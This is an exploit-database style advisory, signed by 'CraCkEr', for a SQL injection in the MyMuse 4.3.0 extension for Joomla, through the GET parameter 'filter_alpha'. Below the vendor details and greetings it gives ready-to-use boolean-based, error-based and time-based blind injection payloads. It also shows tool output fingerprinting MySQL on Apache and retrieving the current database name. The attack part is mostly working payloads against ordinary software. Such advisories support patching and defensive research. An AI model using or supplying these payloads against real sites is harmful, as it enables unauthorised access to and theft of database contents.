┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Gordon Fisch - joomlamymuse.com │ │ Software : MyMuse 4.3.0 Extension for Joomla │ │ Vuln Type: SQL Injection │ │ Method : GET │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise │ │ │ │ │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php/en/mymuse-views/list-of-tracks?filter_alpha=A GET parameter 'filter_alpha' is vulnerable --- Parameter: filter_alpha (GET) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET) Payload: filter_alpha=A%' AND MAKE_SET(5052=5052,3360) AND 'xQKG%'='xQKG&filter_order=a.title ASC&limit=10&start=10 Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: filter_alpha=A%' AND EXTRACTVALUE(2078,CONCAT(0x5c,0x716a6b7671,(SELECT (ELT(2078=2078,1))),0x71627a7671)) AND 'QXSg%'='QXSg&filter_order=a.title ASC&limit=10&start=10 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: filter_alpha=A%' AND (SELECT 5976 FROM (SELECT(SLEEP(5)))vLkv) AND 'tLCw%'='tLCw&filter_order=a.title ASC&limit=10&start=10 --- [+] Starting the Attack [INFO] the back-end DBMS is MySQL web application technology: Apache back-end DBMS: MySQL >= 5.1 [INFO] fetching current database INFO] retrieved: '*********' current database: ''*********'' [-] Done